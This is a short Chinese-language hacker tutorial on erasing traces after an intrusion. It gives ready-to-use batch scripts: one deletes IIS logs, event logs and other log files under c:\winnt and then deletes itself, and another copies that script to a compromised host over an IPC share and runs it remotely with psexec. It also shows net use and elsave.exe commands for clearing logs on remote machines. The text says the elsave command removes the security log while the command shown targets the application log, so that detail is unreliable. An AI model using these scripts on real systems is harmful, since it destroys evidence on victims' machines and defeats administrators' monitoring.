大多數(shù)情況下,IIS的日志會忠實(shí)地記錄它接收到的任何請求(也有特殊的不被IIS記錄的攻擊),一個優(yōu)秀的系統(tǒng)管理員會利用這點(diǎn)來發(fā)現(xiàn)入侵的企圖,保護(hù)自己的系統(tǒng)。所以如果你是黑客,入侵系統(tǒng)成功后第一件事便是清除日志,擦去自己的形跡,這時可以用以下兩個辦法:一是自己編寫批處理文件來解決,編寫一個能清除日志的批處理非常簡單,方法是:新建一個具有如下內(nèi)容的批處理文件:
@del c:\winnt\system32\logfiles\*.*
@del c:\winnt\system32\config\*.evt
@del c:\winnt\system32\dtclog\*.*
@del c:\winnt\system32\*.log
@del c:\winnt\system32\*.txt
@del c:\winnt\*.txt
@del c:\winnt\*.log
@del c:\del.bat
把上面的內(nèi)容保存為del.bat備用。在上面的代碼中echo是DOS下的回顯命令,在它的前面加上“@”前綴字符,表示執(zhí)行時本行在命令行或DOS里面不顯示,另外del命令大家一定清楚吧?它是刪除文件命令。
接下來再新建一個批處理文件,內(nèi)容如下:
@copy del.bat \\%1\c$
@echo 向肉雞復(fù)制本機(jī)的del.bat……OK
@psexec \\%1 c:\del.bat
@echo 在肉雞上運(yùn)行del.bat,清除日志文件……OK
保存為clean.bat即可,假設(shè)已經(jīng)與肉雞進(jìn)行了IPC連接,然后在CMD下輸入:clean.bat 肉雞IP,即可清除肉雞上的日志文件。
清除日志的另外一個方法是借助第三方軟件,如著名黑客軟件流光的開發(fā)者黑客小榕的elsave.exe,就是是一款可以遠(yuǎn)程清除系統(tǒng)日志、應(yīng)用程序日志、安全日志的軟件,大家可以在網(wǎng)上下載到。elsave.exe使用起來很簡單,首先利用獲得的管理員賬號與對方建立IPC會話:net use \\ip pass /user: user,然后在命令行下執(zhí)行如下命令:elsave -s \\ip -l application -C,這樣就刪除了安全日志。
聯(lián)系客服